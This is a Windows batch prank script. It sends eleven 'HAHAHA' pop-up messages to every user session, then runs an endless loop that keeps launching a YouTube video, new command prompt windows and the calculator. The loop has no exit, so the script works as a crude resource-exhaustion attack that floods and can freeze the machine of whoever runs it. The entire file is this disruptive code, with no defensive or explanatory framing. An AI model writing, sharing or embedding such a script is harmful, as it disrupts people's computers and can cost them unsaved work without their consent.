@echo off
msg * HAHAHAHAHAHAHAHAHA
msg * HAHAHAHAHAHAHAHAHA
msg * HAHAHAHAHAHAHAHAHA
msg * HAHAHAHAHAHAHAHAHA
msg * HAHAHAHAHAHAHAHAHA
msg * HAHAHAHAHAHAHAHAHA
msg * HAHAHAHAHAHAHAHAHA
msg * HAHAHAHAHAHAHAHAHA
msg * HAHAHAHAHAHAHAHAHA
msg * HAHAHAHAHAHAHAHAHA
msg * HAHAHAHAHAHAHAHAHA
: loop
start https://www.youtube.com/watch?v=SbJN4dDcBzw
start cmd
start calc
goto loop